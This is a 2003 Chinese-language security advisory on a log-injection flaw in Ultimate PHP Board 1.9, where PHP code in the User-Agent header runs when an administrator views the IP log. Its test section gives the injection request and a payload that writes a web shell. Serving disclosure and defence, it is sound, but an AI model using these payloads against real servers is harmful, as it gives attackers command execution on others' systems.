发布日期：2003-05-24
更新日期：2003-05-29

受影响系统：

Ultimate PHP Board Ultimate PHP Board 1.9

描述：

---

BUGTRAQ  ID: 7678

Ultimate PHP Board (UPB)是一款由PHP编写的免费开放源代码公告板程序，可使用在Unix和Linux操作系统下。

UPB由于在记录日志数据到PHP文件时没有充分过滤用户输入，远程攻击者可以利用这个漏洞可能以WEB进程权限在系统上执行任意命令。

UPB记录一些浏览者的信息(如REMOTE_ADDR和HTTP_USER_AGENT)到'db'目录下的'iplog'文件中，管理员一般会在管理员面板中调用admin_iplog.php脚本来查看'ioplog'信息，但是由于在记录数据到日志文件中的时候没有充分过滤用户提供的输入，如'User-Agent:'字段内容，如果攻击者提供恶意PHP代码在此字段，当管理员调用脚本查看日志时，就会导致PHP代码以WEB进程权限被执行。

<*来源：euronymous （just-a-user@yandex.ru）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=105379741528925&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

euronymous （just-a-user@yandex.ru）提供了如下测试方法：

e@some_host$ telnet hostname 80
Connected to hostname at 80
GET /board/index.php HTTP/1.0
User-Agent: <? phpinfo(); ?>

或者提供<? system( "echo \'<? system( $cmd ); ?>\' > ../../tcsh.php" ); ?>数据。

建议：

---

厂商补丁：

Ultimate PHP Board
------------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.webrc.ca/php/upb.php

浏览次数：3839
严重程度：0（网友投票）